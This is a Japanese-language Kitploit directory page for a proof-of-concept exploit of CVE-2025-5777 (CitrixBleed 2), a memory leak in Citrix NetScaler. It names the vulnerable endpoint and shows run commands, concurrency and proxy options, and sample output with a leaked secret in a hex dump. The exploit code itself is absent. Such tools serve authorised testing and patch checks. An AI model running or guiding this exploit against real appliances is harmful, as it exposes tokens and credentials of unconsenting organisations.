Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5777 — Citrix NetScaler メモリリーク PoC | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
脆弱性分析エクスプロイト情報収集ウェブセキュリティペネトレーションテストレッドチーミング
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

Citrix NetScaler メモリリーク PoC

リポジトリを見る
2411年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-5777 - Citrix NetScaler メモリリーク PoC

📌 説明

このスクリプトは、Citrix NetScaler ADC/Gateway アプライアンスの深刻なメモリ情報漏洩脆弱性(CVE-2025-5777、通称 CitrixBleed 2)を悪用します。/p/u/doAuthentication.do エンドポイントを介してメモリリークをトリガーし、XML フラグメント、トークン、場合によっては資格情報などの機密データを含む未初期化メモリを露出させます。

  • 📅 CVE ID: CVE-2025-5777
  • ⚙️ 影響: 情報漏洩
  • 🧑‍💻 作者: [0xgh057r3c0n]
  • 🧵 並行性: aiohttp による非同期
  • 📦 依存関係: aiohttp, colorama

🚀 機能

  • asyncio + aiohttp を使用した非同期大量リクエストエンジン
  • 漏洩メモリ断片の16進ダンプ
  • <InitialValue> メモリリークの自動検出
  • デバッグおよび応答プレビューのための詳細モード
  • 丁寧な割り込み処理 (Ctrl+C)

  • 🧪 使用法

    root@kitploit:~
    python3 CVE-2025-5777.py http://<target> [options]
    

    🔧 オプション

    オプション説明
    -v, --verbose詳細なデバッグ出力を有効にする
    -p <proxy>HTTPプロキシを使用する(例: http://127.0.0.1:8080)
    -t <threads>並行リクエスト数(デフォルト: 10)

    📥 例

    root@kitploit:~
    python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
    

    📤 出力例

    root@kitploit:~
    _____________   _______________         _______________   ________   .________          .___________________________________ 
    \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
    /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
    \     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
     \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
            \/                  \/                  \/     \/         \/       \/                 \/                             
    
             Citrix NetScaler メモリリーク PoC (CVE-2025-5777)
                         作者: 0xgh057r3c0n
    
    [🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
    [✔️ ] InitialValue メモリリークを発見!
    [🧠] 16進ダンプ:
    ------------------------------------------------------------------------
    00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
    00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
    00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
    ------------------------------------------------------------------------
    
    [✔️ ] リーク確認。抽出を続行...
    

    ⚠️ 免責事項

    この概念実証は教育目的および許可されたセキュリティテストのみを対象としています。 所有していないシステムへの無断スキャンや悪用は違法です。


    ツールをダウンロード